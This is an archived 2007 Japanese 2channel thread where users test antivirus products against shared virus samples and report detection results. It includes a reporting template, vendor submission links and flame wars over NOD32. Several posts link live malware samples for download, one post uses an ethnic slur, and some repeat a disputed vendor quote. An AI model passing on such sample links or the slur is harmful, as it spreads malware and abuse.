5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【気違い】検出可否報告スレ3【禁止】

1 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:24:05
各ウイルス対策ソフトの検出可否を独自に調査し報告するスレです。
IDが無いため検出結果を張る際はSSを必ず張ってください。
うpろだはなるべく流れにくいところにしましょう。
特定のウイルス対策ソフトを擁護、非難する書き込みはやめましょう

気違いが出没してますから各自注意願います

前スレ
【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/

2 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:24:52
【検体サンプル】>>(検体URLのレス番号)
【ソフト名】
【結果】
【SS】http://


3 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:25:04
新種・亜種ウイルスを発見した場合のサンプル提出先

ノートン http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ウイルスバスター http://inet.trendmicro.co.jp/esolution/supform.asp
(バスターユーザー以外はhttp://www.trendmicro.com/jp/security/virushunter.htm
           http://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7
マカフィー http://www.nai.com/japan/security/contactavert.asp
                  ・
                  ・
                  ・

4 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:25:16
前スレで起こった様々な問題

・圧縮ファイルと検出数
 exeの中身を検査数に入れるソフト、入れないソフトがあります。ご注意を。
・DOSウイルス禁止
 大昔のウイルスを集めてきても無意味なことがあります。
・パスなしZIPをパス有りLZH(またはRAR)で
 安全性と利便性のため、上記の手法を推奨します。
・淡々とやれ淡々と!
 淡々と貼り、淡々といきましょう。
・ブラクラ禁止
 ブラクラ等、想定しないものを無言で貼らないこと
・ここは検出力調査スレなんだから時間の経った報告は、同時点での検出結果比較の対象にならない
 んなこたーない。時間が経過したときにどれだけ対応数が増えているかも重要。
 という意見もあり。

5 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:25:28
新種・亜種ウイルスを発見した場合のサンプル提出先

ノートン http://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949
ウイルスバスター http://inet.trendmicro.co.jp/esolution/supform.asp
(バスターユーザー以外はhttp://www.trendmicro.com/jp/security/virushunter.htm
           http://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7
マカフィー http://www.nai.com/japan/security/contactavert.asp
ウイルスセキュリティ(K7Computing) http://k7computing.com/faq.htm
NOD32アンチウイルス http://www.eset.com/support/ans/9d.htm
V3ウイルスブロック http://info.ahnlab.com/customer/virus_call.html
ウイルスドクター http://www.virusdoctor.jp/virus/
Dr.WEB http://drweb.jp/support/?virus_sample
ソフォス http://www.sophos.co.jp/support/queries/#sample
F-Secure http://www.f-secure.co.jp/support/samples/
kaspersky http://www.kaspersky.co.jp/ 一番下の「新しいウイルスをお知らせ下さい」

6 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:25:39
新種・亜種ウイルスを発見した場合のサンプル提出先

つづき

バイロボット(hauri) http://www.haurijapan.com/support/vreport01.php
キングソフトアンチウィルス http://is.kingsoft.jp/support/kentai.htm
キングソフトアンチウィルス http://www.kingsoft.jp/support/is/kentai.htm
BitDefender http://www.bitdefender.com/bd/site/contactus.php
AntiVir ttp://www.avira.com/en/support/submit_suspicious_files.html
ewindo(AVG Anti Spyware) ttp://www.ewido.net/en/malware/
AVG http://www.grisoft.cz/FAQEN/general_questions.htm
avast! http://www.avast.com/eng/technical_support.html
eTrust http://www.caj.co.jp/support/csp/free_policy/virus.htm
F-PROT http://www.f-prot.com/virusinfo/submission_form.html
esafe  http://www.aladdin.com/home/csrt/vsubmit.asp
a2(a-squared) http://www.emsisoft.jp/jp/support/submit/

7 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:54:30
>>6 新種・亜種ウイルスを発見した場合のサンプル提出先(追加)

Rising  ttp://up.rising.com.cn/webmail/uploadnew.htm
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

□過去スレで起こった様々な問題と反省点

・exeの検査について
 exeの中身を検査数に入れるソフト入れないソフトがあります。ご注意を
・DOSウイルス禁止
 DOSウイルスなど大昔のウイルスを集めてきても無意味なことがあります
・検体はパス無し書庫をパス有り書庫で固める(二重書庫状態)
 安全性と利便性のため、上記の手法を推奨します
・淡々と貼り淡々といきましょう
・ブラクラ等想定しないものを無言で貼らないこと
・ここは検出力調査スレなんだから時間の経った報告は、同時点での検出結果比較の対象にならない
 →んなこたーない。時間が経過したときにどれだけ対応数が増えているかも重要。
 という意見もあり
・ウイルスの能力への評価・言及は危険?あくまで検出可否だけに留めたほうが良いでしょう

ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
□FAQ
(;´Д`)<「ウイルス鑑定スレ」と何処か違うの?
(・∀・)<ウイルスを提供するスレです。鑑定スレではありません。
アンチウイルスソフトで検体の検出可否を報告できる方は、奮ってご参加ください。

(;´Д`)<擁護非難厨がうざい・・・
(・∀・)<無視!最強の反撃手法です。

8 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:57:08
>>1-2の差し替え(案)

検出可否報告スレ3

・各種ウイルス対策ソフトの検出可否を独自に調査し報告するスレです
・検出結果を張る際はスクリーンショットを必ず貼ってください
・うpろだはなるべく流れにくいところにしましょう
 (一例)2ch@セキュリティ板画像アップローダー
ttp://www5.uploader.jp/home/tane/
・特定のウイルス対策ソフトを擁護、非難する発言は絶対にやめましょう

□過去スレ
01【信者】検出力調査スレ【禁止】
ttp://pc11.2ch.net/test/read.cgi/sec/1174461579/
02【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/
ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー
□報告テンプレ
【検体サンプル】>>(検体URLのレス番号)
【ソフト名】
【結果】
【SS】http://

ーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーーー

9 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:57:10
オレは前スレの1の努力を無駄にしたくはないんだが

10 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:57:49
----------------------テンプレ終わり---------------------------

11 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:58:08
ちなみにこれ↓
ーーーーーーーーーー
は番号の区切り。

12 :名無しさん@お腹いっぱい。:2007/06/15(金) 00:58:54
一応、前スレの1の意志に従って
べつすれたてるよ

13 : ◆5P2LbbKfE6 :2007/06/15(金) 00:59:08
【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/
の1です。

このスレは本スレではありません。
今から本スレ用テンプレを張りますので、どなたかスレ立てをお願いします。
途中で割り込みが入るかもしれません。コテで判別して下さい。

14 : ◆5P2LbbKfE6 :2007/06/15(金) 01:01:12
スレタイ

検出可否報告スレ3


15 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:01:18
このスレを使うんだったら
【NOD厨】検出力調査スレ【出禁】
ttp://pc11.2ch.net/test/read.cgi/sec/1177739872/
を埋めてからにすべきだな。

16 : ◆5P2LbbKfE6 :2007/06/15(金) 01:02:30
・各種ウイルス対策ソフトの検出可否を独自に調査し報告するスレです
・検出結果を張る際はスクリーンショットを必ず貼ってください
・うpろだはなるべく流れにくいところにしましょう
 (一例)2ch@セキュリティ板画像アップローダー
ttp://www5.uploader.jp/home/tane/
・特定のウイルス対策ソフトを擁護、非難する発言は絶対にやめましょう

□過去スレ
01【信者】検出力調査スレ【禁止】
ttp://pc11.2ch.net/test/read.cgi/sec/1174461579/
02【信者】検出可否報告スレ2【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1177848342/


17 : ◆5P2LbbKfE6 :2007/06/15(金) 01:03:13
□報告テンプレ
【検体サンプル】>>(検体URLのレス番号)
【ソフト名】
【結果】
【SS】http://


18 : ◆5P2LbbKfE6 :2007/06/15(金) 01:03:55
□新種・亜種ウイルスを発見した場合のサンプル提出先

ノートン Symantec Security Response USA 〔Upload a suspected infected file〕
ttps://submit.symantec.com/websubmit/retail.cgi
ウイルスバスター ttp://inet.trendmicro.co.jp/esolution/supform.asp
(バスターユーザー以外はttp://www.trendmicro.com/jp/security/virushunter.htm
           ttp://subwiz.trendmicro.com/SubWiz/Wizard.asp?opgWizard=7
マカフィー ttp://www.nai.com/japan/security/contactavert.asp
ウイルスセキュリティ(K7Computing) ttp://k7computing.com/faq.htm
NOD32アンチウイルス ttp://www.eset.com/support/ans/9d.htm
V3ウイルスブロック ttp://info.ahnlab.com/customer/virus_call.html
ウイルスドクター ttp://www.virusdoctor.jp/virus/
Dr.WEB ttp://drweb.jp/support/?virus_sample
ソフォス ttp://www.sophos.co.jp/support/queries/#sample
F-Secure ttp://www.f-secure.co.jp/support/samples/
kaspersky ttp://www.kaspersky.co.jp/ 一番下の「新しいウイルスをお知らせ下さい」
バイロボット(hauri) ttp://www.haurijapan.com/support/vreport01.php
キングソフトアンチウィルス ttp://is.kingsoft.jp/support/kentai.htm
キングソフトアンチウィルス ttp://www.kingsoft.jp/support/is/kentai.htm
BitDefender ttp://www.bitdefender.com/bd/site/contactus.php
AntiVir ttp://www.avira.com/en/support/submit_suspicious_files.html
ewindo(AVG Anti Spyware) ttp://www.ewido.net/en/malware/
AVG ttp://www.grisoft.cz/FAQEN/general_questions.htm
avast! ttp://www.avast.com/eng/technical_support.html
eTrust ttp://www.caj.co.jp/support/csp/free_policy/virus.htm
F-PROT ttp://www.f-prot.com/virusinfo/submission_form.html
esafe  ttp://www.aladdin.com/home/csrt/vsubmit.asp
a2(a-squared) ttp://www.emsisoft.jp/jp/support/submit/
Rising  ttp://up.rising.com.cn/webmail/uploadnew.htm


19 : ◆5P2LbbKfE6 :2007/06/15(金) 01:04:38
□過去スレで起こった様々な問題と反省点

・exeの検査について
 exeの中身を検査数に入れるソフト入れないソフトがあります。ご注意を
・DOSウイルス禁止
 DOSウイルスなど大昔のウイルスを集めてきても無意味なことがあります
・検体はパス無し書庫をパス有り書庫で固める(二重書庫状態)
 安全性と利便性のため、上記の手法を推奨します
・淡々と貼り淡々といきましょう
・ブラクラ等想定しないものを無言で貼らないこと
・ここは検出力調査スレなんだから時間の経った報告は、同時点での検出結果比較の対象にならない
 →んなこたーない。時間が経過したときにどれだけ対応数が増えているかも重要。
 という意見もあり
・ウイルスの能力への評価・言及は危険?あくまで検出可否だけに留めたほうが良いでしょう


20 : ◆5P2LbbKfE6 :2007/06/15(金) 01:06:24
□FAQ
Q:「ウイルス鑑定スレ」と何処か違うの?
A:ウイルスを提供するスレです。鑑定スレではありません。
 アンチウイルスソフトで検体の検出可否を報告できる方は、奮ってご参加ください。

Q:擁護非難厨がうざい・・・
A:無視しましょう。

21 : ◆5P2LbbKfE6 :2007/06/15(金) 01:08:46
以上です。

22 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:12:06
何か立ったな。
ttp://pc11.2ch.net/test/read.cgi/sec/1181836779/
何故、こうも人の努力を踏みにじろうとするかね。

23 : ◆5P2LbbKfE6 :2007/06/15(金) 01:14:40
ああああああああああああああああああ・・・・・・・・・・・・・・・・・
明日早いのでもう寝ます。

24 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:17:23
ここは本スレです。

前スレの1は前スレで本スレのタイトルを了承してますし、
前スレの1自身が建てたスレにも【信者】【禁止】は入ってますから、
本スレに【気違い】が入っていることを理由に反発するのは異常です。
本スレに【気違い】が入っていることで反発するのは気違い本人様だけで十分ですし、
反発から暴走するのならアク禁へ、今までどおりなら一般参加者への注意となり有用です。

25 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:19:22
【信者】検出可否報告スレ3【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1181836779/l50


26 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:19:38
スレタイの件は100歩譲ったとしても
テンプレを無視した件は許せん。

このスレは>>15の言うように
【NOD厨】検出力調査スレ【出禁】
ttp://pc11.2ch.net/test/read.cgi/sec/1177739872/
の次スレだろ。

27 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:21:32
>>26
> テンプレを無視した件は許せん。
無視してねぇよ、建てた後でお前等が勝手に作ったテンプレを強要するのはよせw

28 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:24:50
気違い排除のこのスレが本スレ
信者の参加は歓迎する

29 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:26:57
確かにテンプレが貼られたのはこのスレは立った後だな。
しかしどうして>>975を無視したんだ。

30 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:35:18
>29
> しかしどうして>>975を無視したんだ。
975を見て分らないのか?、候補である【気違い】を勝手に外し、【信者】を含めたのは異常だ。
信者は害にならない排除する正当な理由はない。
気違いは排除すべきなのはスレの流れから当然でありそれを勝手に外すのは信義に反している。

> 975 名前:1 投稿日:2007/06/15(金) 00:06:46
> 次スレ用テンプレ完成した。
> スレタイ悩み中。
> 【検体】検出可否報告スレ3【送るぞ】
> 【信者】検出可否報告スレ3【禁止】

31 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:39:58
>>975
あー、【気違い】案は勝手に外されてるねーw
でも、気違いは自覚がないんだからスレタイに入れても無駄でしょ。
大体、排除したいんなら【NOD厨】検出力調査スレ【出禁】を使えばいい。

32 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:41:12
>信者は害にならない排除する正当な理由はない。
ここの日本語説明してくれる?

33 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:47:13
>>30
なるほど、分かったぞ。
>>30=>>1は何らかのソフトの信者なんだな?
だから【信者】【禁止】が気にくわなかったわけだ。
それで◆5P2LbbKfE6に反発してこのスレを立てた。
>>978とかも無視だ。
しかし◆5P2LbbKfE6は最終的にスレタイを
検出可否報告スレ3
にしたんだぞ。
そっちの方がお前にとってもいいだろう。

34 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:51:03
>>33
信者を抜きにした検出可否報告スレってありえねぇし
様々なAVの信者が集ってこその検出可否報告スレであります。

気違いはしんでくれ

35 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:55:44
> しかし◆5P2LbbKfE6は最終的にスレタイを
> 検出可否報告スレ3
> にしたんだぞ。
> そっちの方がお前にとってもいいだろう。
そんなの今更だろ?
【気違い】を外す議論を経てから言えよ。
それと【検体】【送るぞ】を検討対象にしない理由も説明してくれ。

というか◆5P2LbbKfE6が本気で反省するのならここへ出てきて議論しろ

36 : ◆5P2LbbKfE6 :2007/06/15(金) 01:56:00
俺が考えて俺が立てるのが気に食わなかったのなら、前もってそう言えば良かったんだ。
だからわざわざ21時あたりに前もって次スレを立てる意志を書いた。


37 :名無しさん@お腹いっぱい。:2007/06/15(金) 01:58:01
>>36
アホか?
意見は色々出てただろう、それを無視して何を言ってやがる。
975の段階のお前は気違い本人様に間違えられてもおかしくねぇ行動だ、反省しろ。

38 : ◆5P2LbbKfE6 :2007/06/15(金) 02:05:56
>>37
なんなら徹底的に討論しようか?何時まで起きてるつもりだ。


39 :名無しさん@お腹いっぱい。:2007/06/15(金) 02:17:49
>>38
先に反省の弁をしてからだろ
ちゃんと手順を踏め。
話はそれからだ。

40 : ◆5P2LbbKfE6 :2007/06/15(金) 02:23:02
やはり今は自粛します。


41 :名無しさん@お腹いっぱい。:2007/06/15(金) 02:24:19
取り敢えず今は頭を冷やせ、明日以降議論する気があるのなら付き合ってやる。

42 :名無しさん@お腹いっぱい。:2007/06/15(金) 02:39:59
スレタイなんてどうでもいいだろ
何を神経質になってんだか

43 :名無しさん@お腹いっぱい。:2007/06/15(金) 03:05:19
●●●●● 自民党の悪行 ●●●●●

・契約社員、派遣労働者を増やして、将来に不安を抱える若者を大量に作り出す。

・ホワイトカラーエグゼンプションでサービス残業合法化する法案をすすめる。(法人税は減税中)
 (外相麻生は派遣会社を抱えるファミリー企業を率いる。政府に重用される奥谷禮子は
 人材派遣業社長でアムウェイの元顧問。「過労死は自己責任」「労基署は不要」と発言)

・郵政造反議員が復党:国民が選挙で示した民意は無視。
・特定郵便局の改革を進めていた郵政公社総裁をクビに。新総裁は特定局維持の方針。
   ↑(世襲公務員)
・メディア規制法案で報道規制を計る。新憲法案でも9条の影に隠れて表現の自由規制を進める。

・道路郵政改革ともに骨抜き。無駄遣いと高額なインフラをスリムアップして国際競争力を
 つけるどころか、無駄な税金寄生組織を温存し、そのツケは増税とサビ残合法化で
 一般国民に押しつける。

その他
・安倍の後援会”安晋会”はライブドア事件変死の野村が理事。ヒューザー小嶋が会員。
・なんとか還元水の使途不明金疑惑中に松岡農林大臣がもみ消し自殺。
・郵政民営化法案の時、亀井派で1人賛成した長岡議員が自殺。遺書は見つかっていない。
・行政改革担当大臣が隠し献金
・厚生大臣が「女性は産む機械」発言
・公務員との年金の統合をします。→同時に公務員だけ割増し制度併設で形だけ中身なし
・天下り禁止します。→ 天下りを斡旋する部署を変えただけで形だけ中身なし
・現在進められている「労働法制」の改定(ホワイトカラーイグゼンプション、金を出せば
 違法な解雇も合法化、労働条件を自由に切り下げ可能)

参院選で自民党に投票したり投票に行かないのはこの政策に「YES」と言うのと同じ。
NOと言うなら、どこでもいいから他に投票すること

44 :名無しさん@お腹いっぱい。:2007/06/15(金) 03:47:06
意見は色々出ていた。
あんまりにも収集がつかないので
◆5P2LbbKfE6は中庸案として【】【】を
削除する案を出してみんなの意見を待った。

んで>>39は意見を待つことなくいきなり立てた。
反省すべきなのはどっちだ?


45 :名無しさん@お腹いっぱい。:2007/06/15(金) 04:30:46
>>1
気違い禁止ってスレタイで何が予防できるんだ?
あほ?

46 :名無しさん@お腹いっぱい。:2007/06/15(金) 05:50:56
一般人の思考では理解出来ないけれど、
気違いの思考だとそれで予防可能となってるから安心
気違い本人が言ってたことだから信じておけw

47 :名無しさん@お腹いっぱい。:2007/06/15(金) 05:55:23
気違いの思考を理解するのに重要な資料

気違いのお言葉
> アンチNOD厨嫌い ◆Tcp44q2AKAは立ち入り禁止。
> コテハンを変えても、名無しでもだめです。
> と、なっておりますのでよろしくお願いいたします。

48 :名無しさん@お腹いっぱい。:2007/06/15(金) 06:04:09
いくらスレタイ変えようと出没するのがキチガイだろ

49 :名無しさん@お腹いっぱい。:2007/06/15(金) 11:10:02



>>1=NOD厨z





50 :名無しさん@お腹いっぱい。:2007/06/15(金) 12:10:00
こっちが先か

51 :1:2007/06/15(金) 12:24:13
      上、         \, ,/         ,エ
       `,ヾ         ,;;iiiiiiiiiii;、       _ノソ´
        iキ       ,;;´  ;lllllllllllllii、      iF
        iキ'     ,;´  ,;;llllllllllllllllllllii、    ナf
         !キ、._  ,=ゞiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii!! __fサ
          `ヾ=;三ミミミミヾ仄彡彡ミミヾ=`´
           ,._Ξミミミミミヾ巛彡////iii_
         ;if≡|ヾヾヾミミミミヾヾ、//巛iiリ≡キi
          if!  |l lヾヾシヾミミミ川|ii//三iリ `キi
        ,if ,f=|l l lヾリリリリリ川川|爪ミミiリ=t、キi
          ;iナ,サ |l l l リリ川川川川|爪ミミiiリ キi キi
          iナ ;サ |l l リリリリ川川川川l爪ミミilリ キi キi
        iサ ;サ, |リ リリ川川川川川l爪ミミiリ ,キi キi
         iサ ;サ, | リ彡彡川川川川|爪ミミiリ ,キi :キ、
        ,i厂 iサ, |彡彡彡彡ノ|川川|爪ミミリ ,キi `ヘ、
      ,√  ;サ, |彡彡彡彡ノ川川|ゞミミミリ ,キi   `ヾ
     ´    ;サ,  |彡彡彡彡川川リゞミミリ  ,キi
         ;サ,  |彡彡彡彡リリリミミミシ   ,キi
         ,;#,    |彡彡ノリリリリミミミシ    ,キi
        ;メ'´    !彡ノリリリリリゞミミシ     `ヘ、
       ;メ      ヾリリリリノ巛ゞシ       `ヘ、
      ;メ        ``十≡=十´         `ヘ、
                 ノ    ゞ

52 :名無しさん@お腹いっぱい。:2007/06/15(金) 12:25:27
AV-Test.org Reports Stats from Antivirus Roundup 検知力テスト結果 (2007年05月22日)
ttp://www.pcmag.com/article2/0,1895,2135053,00.asp

01位)WebWasher  99.83% (605,846)
02位)AVK 2007   99.56% (604,255)
03位)AntiVir     99.42% (603,408)
04位)F-Secure.   97.93% (594,333)
05位)Symantec   97.77% (593,355)
06位)Kaspersky   97.64% (592,606)
07位)Fortinet.    97.06% (589,028)
08位)Avast!.     96.32% (584,574)
09位)AVG.      96.15% (583,541)
10位)Rising      96.02% (582,772)
11位)BitDefender  95.68% (580,700)
12位)Norman..    94.66% (574,476)
13位)Ikarus..     92.54% (561,607)
14位)Panda.     92.09% (558,899)
15位)Trend Micro 90.97% (552,107)
16位)Nod32.     88.32% (536,043)
17位)McAfee     87.28% (529,680)

53 :名無しさん@お腹いっぱい。:2007/06/15(金) 12:29:43
キチガイが荒らし始めたな

54 :名無しさん@お腹いっぱい。:2007/06/15(金) 12:54:10
自演乙

55 :名無しさん@お腹いっぱい。:2007/06/15(金) 12:57:34
という自演乙

56 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:12:20
>>54
気違い乙

57 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:14:44
気違いがこのスレを荒らす理由

至上最強のNOD32の検知力の高さが世間に知れ渡ってしまうことを恐れている




58 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:19:21
それが真相なんじゃね。
NOD32の検知力の物凄さは世界中の知識人が認めるところだからな。
こういうスレを立てることで知識の乏しい素人にもNOD32の物凄さが分かってしまうからな。

59 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:22:35
いずれ世界中にNODの素晴らしさが轟く日も近いのでは。
気違いは無駄な抵抗をしているだけだなw

60 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:24:21
NODユーザーって気持悪いですね…

61 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:25:29
メール蘭変えてまでw

62 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:25:49
>>52
信頼度は超S

Andreas Clementi(アンドレアス・クレメンティ)氏の発言したとする一次ソースは→http://www.canon-sol.co.jp/topics/20070214nod.htm

発言内容は下記
> AV-comparatives.orgのプロジェクトマネージャであるAndreas Clementi(アンドレアス・クレメンティ)氏は、次のように述べています。
> 「2006年度のレポートには、NOD32アンチウイルスが、1つのみならず複数のテストカテゴリにおいて競合製品をリードしているということが示されています。
> NOD32アンチウイルスは、最新の、そして今後さらに進化すると予想される複雑なマルウェアもプロアクティブに検出し、駆除することができます。
> スキャンの速度と精度を両立し、さらにアドバンスドヒューリスティック機能を備えるNOD32アンチウイルスは、現時点において、
> まちがいなく最もパフォーマンスのすぐれたアンチウイルス製品であると言えます。」

63 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:33:25
>>62
専門家が言っているなら間違いないですね。
今ままでは静観していましたがNOD32にとても興味が沸いてきました。
お試し版はあるのでしょうか?

64 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:35:00
>>63
ここでダウソできますよ^^
http://canon-sol.jp/product/nd/trial.html

65 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:39:36
>>64
レスどもです。
さっそく試してみます。
キチガイさんの荒らしに負けずに此処を盛り立てていきましょうね。

66 :名無しさん@お腹いっぱい。:2007/06/15(金) 13:59:18
そうですな
基地外が立てた重複スレを使うということは
基地外に屈するということ

良心的なセキュリティ板の常連は
この本スレを使うべきだろうと思う

67 :名無しさん@お腹いっぱい。:2007/06/15(金) 14:25:43
◆5P2LbbKfE6はタイトルどうしようとか書き込む前に
テンプレ案を貼るべきだったな。

68 :名無しさん@お腹いっぱい。:2007/06/15(金) 14:58:04
Eset社の戦略としてシグネチャは出来るだけ少なく最小の発行数に留める方針。
これは近年亜種の急増により発行シグネチャが爆発的に増加している状況への対応策。
このままだと何れ発行シグネチャが増え過ぎで立ち行かぬとの判断が優先された結果であり、
亜種は発行済みシグネチャとアンパッカー技術により検出する方向で改良を続けており、
そこに拡張ヒューリスティックエンジンを組み合わせることで類似ウィルスまで捕捉しようとの試みを含んでいる。


Eset社の戦略としてシグネチャは出来るだけ少なく最小の発行数に留める方針。
これは近年亜種の急増により発行シグネチャが爆発的に増加している状況への対応策。
このままだと何れ発行シグネチャが増え過ぎで立ち行かぬとの判断が優先された結果であり、
亜種は発行済みシグネチャとアンパッカー技術により検出する方向で改良を続けており、
そこに拡張ヒューリスティックエンジンを組み合わせることで類似ウィルスまで捕捉しようとの試みを含んでいる。

69 :名無しさん@お腹いっぱい。:2007/06/15(金) 16:23:29
動画型トロイ発見
ttp://dogalog.excite.co.jp/viewvideo.jspx?Movie=48091804/48091804peevee49144.flv

これどうよ?

70 :名無しさん@お腹いっぱい。:2007/06/15(金) 17:57:27
ttp://www.rupan.net/uploader/download/1181897481.rar
virus

71 :名無しさん@お腹いっぱい。:2007/06/15(金) 20:44:14
>>70
なんかいつもの所と違うな。

72 :名無しさん@お腹いっぱい。:2007/06/15(金) 21:58:33
これ掘ったら凄いだろうな

73 :名無しさん@お腹いっぱい。:2007/06/15(金) 23:11:46
>>1

  朝 イ
  鮮 タ
  半 チ
  島 と
  へ 一
  帰 諸
  り に
  な
  さ
  い
  。


>大阪で「朝鮮イタチ」による被害が急増
http://headlines.yahoo.co.jp/hl?a=20070614-00000903-san-soci
>イタチが都市部で頻繁に出没し、生ごみを散らかしたり、
>ニワトリを襲ったりするなどの被害が相次いでいる。
>大陸から入ったチョウセンイタチが多いとみられ、
>えさの生ごみなどが多い都市部の環境に順応しているようだ。

74 :名無しさん@お腹いっぱい。:2007/06/16(土) 23:25:43
>>69
これか?
>新宿コマ劇場の横の広場に出現したトロイの木馬。なぜここにトロイの木馬が。
>これは映画「トロイ」の宣伝用オブジェでした。

75 :名無しさん@お腹いっぱい。:2007/06/17(日) 00:15:22
        ♪ トロイトロイ ♪
       ∩_∩     ∩_∩     ∩_∩
      (・(ェ)・ )    .(・(ェ)・ )    (・(ェ)・ )
   ((( ;;"~;;;"~゛;;)  ((( ;;"~;;;"~゛;;)  ((( ;;"~;;;"~゛;;)
    . ミ;,,_,ミ;,,_,,;ミ      ミ;,,_,ミ;,,_,,;ミ      ミ;,,_,ミ;,,_,,;ミ

            ♪ トロイトロイ  ♪
     ∩_∩     ∩_∩      ∩_∩
    ( ・(ェ)・)    (. ・(ェ)・)    ( ・(ェ)・.)
     (;;"~゛;;;~゛;; )))  (;;"~゛;;;~゛;; )))  (;;"~゛;;;~゛;; )))
     . ミ;,,_,,;ミ,_,,;ミ    .ミ;,,_,,;ミ,_,,;ミ    .ミ;,,_,,;ミ,_,,;ミ

              ♪  うーっ  ♪
       ∩_∩       ∩_∩       ∩_∩
      (. ・(ェ)・ )     (. ・(ェ)・ )      (.・(ェ)・ )
      ;;"~゛;;;"~゛;;      ;;"~゛;;;"~゛;;     ;;"~゛;;;"~゛;;
      ミ;,,_,,;ミ,,,_,,;ミ     ミ;,,_,,;ミ,,,_,,;ミ     ミ;,,_,,;ミ,,,_,,;ミ


              ♪トロイトロイーーーー♪
  ;;"~'゙;; .∩_∩ ;;"~'゙;; ;;"~'゙;;. ∩_∩ ;;"~'゙;;;;"'~'゙;;. ∩_∩ ;;"~'゙;;
  ミ,,,_,,,ミ( ・(ェ)・)ミ,,,_,,,ミミ,,,_,,,ミ( ・(ェ)・ )ミ,,,_,,,ミミ,,,_,,,ミ( ・(ェ)・ )ミ,,,_,,,ミ
     \    /      \    /      \    /
      |⌒I、│        |⌒I、│       |⌒I、│
     (_) ノ          (_) ノ       (_) ノ
        ∪           ∪              ∪

76 : ◆QXMN1BniMs :2007/06/17(日) 00:19:15
>>62
これまだ言ってたのか
とりあえず随分前にキヤノンに問い合わせたところ否定されたよ
問い合わせた内容は
「Andreas Clementi氏の発言が提示されたPDFの中にない」
http://www.canon-sol.co.jp/topics/20070214nod.htmlはEset社のニュースリリースを翻訳した物ではないか」
「であるなら文責、一次ソース共にキヤノンは保有していない、ということになりますがどうでしょうか」
という質問に対し
「ご指摘の通りです」
とのこと。つまりこのサイトの情報は一次ソースにはならない。キヤノンに文責もない
当たり前のことなんだけど

発言に責任を持つためにトリップを付けるけど、実際レベルの低い言い争いだよね

77 :名無しさん@お腹いっぱい。:2007/06/17(日) 00:50:00
言い争い?
若干名のNOD厨がガセネタをコピペし続けて、
そのたびに板住民から叱られているだけに見えまつ。


78 :名無しさん@お腹いっぱい。:2007/06/17(日) 00:55:14
||    /      \      | ┌────────────────
||  /  ─    ─\    | |氏名: 雑音
||/    (●)  (●) \ | ├────────────────
|||      (__人__)    |. | |生年月日 照和36年 6月6日
||\      ` ⌒´   ,/.  | ├────────────────
||...イ.ヽヽ、___ ーーノ゛- 、   | |現住所: 大阪府大阪市
||   |  '; \_____ ノ.|ヽ i....| ├────────────────
||   |  \/゛(__)\,| i  | | |連絡先: 050-xxx-xxx ( IP電話 )
|└──────────┘ └────────────────
| | 年   |月|          学歴・職歴
| ├───┼─┼──────────────────────
| |平成3 .|03|自宅警備員

79 :名無しさん@お腹いっぱい。:2007/06/17(日) 00:55:46
>>77
コピペしてるのは気違いのお前だろう?
何故嘘をついたりNODユーザーのせいにしたがる?

80 :名無しさん@お腹いっぱい。:2007/06/17(日) 00:56:50
>>79
いつも大嘘、乙カレー。

81 :名無しさん@お腹いっぱい。:2007/06/17(日) 01:03:37
これ、NODスレ主が真剣に貼っているテンプレにしか見えんけど。
http://pc11.2ch.net/test/read.cgi/sec/1181020973/17
このスレも↓、NOD厨が真剣にコピペを貼って、真実だと主張しているようにしか見えん。
http://pc11.2ch.net/test/read.cgi/sec/1177739872/
他にも探せば一杯あると思うが。


82 :名無しさん@お腹いっぱい。:2007/06/17(日) 01:25:25
>>76
問い合わせたというなら、その返信メールをUPしろよ

83 :名無しさん@お腹いっぱい。:2007/06/17(日) 01:26:59
>>76
わかったか

